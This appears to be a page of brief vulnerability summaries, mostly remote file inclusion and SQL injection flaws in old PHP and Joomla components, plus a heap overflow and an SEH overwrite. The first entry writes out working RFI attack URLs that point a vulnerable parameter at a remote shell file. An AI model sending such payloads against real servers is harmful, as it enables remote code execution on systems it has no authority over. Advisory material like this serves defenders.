This bug allows a remote attacker to execute commands via rfi. The vulnerable pages are client.php, configinsert.php, lang.php and server.php. The exploit can be executed by sending a malicious URL like http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt or http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt
Portail PHP v1.7 is vulnerable to a remote inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a parameter ‘chemin’ which points to a malicious script hosted on a remote server. When the vulnerable application processes the malicious URL, the malicious script is executed on the vulnerable server.
This exploit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a forward jump. This would eliminate the need for 2 stages of shellcode.
This vulnerability allows remote attackers to include arbitrary files from local resources. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'mosConfig_live_site' parameter in 'admin.a6mambohelpdesk.php' script. A remote attacker can send a specially crafted HTTP request with arbitrary file inclusion, which will be included and executed by the vulnerable script.
A vulnerability in WMNews allows remote attackers to include arbitrary files via a URL in the base_datapath parameter to index.php.
libmikmod is vulnerable to a heap overflow vulnerability when processing specially crafted GT2 files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.
Etomite CMS version 0.6.1 and below (with all patches applied) is vulnerable to a 'username' SQL injection attack, which can be used to disclose admin credentials. This exploit works when magic_quotes_gpc is set to Off.
The vulnerability is caused due to the 'mosConfig_absolute_path' parameter in the 'include.pcchess.php' script not being properly sanitized before being used to include a file. This can be exploited to include arbitrary local or remote files, which can be used to execute arbitrary PHP code.
X7 Chat is vulnerable to a blind SQL injection vulnerability in the 'old_prefix' argument of the upgradev1.php script. An attacker can exploit this vulnerability to gain admin privileges and access the database.
A remote file inclusion vulnerability exists in Com Multibanners component for Joomla! CMS. The vulnerability is due to the 'extadminmenus.class.php' script not properly sanitizing user-supplied input to the 'mosConfig_absolute_path' parameter. This may allow a remote attacker to include a file from a remote host that contains arbitrary code and execute it in the context of the webserver process.
Services By CQR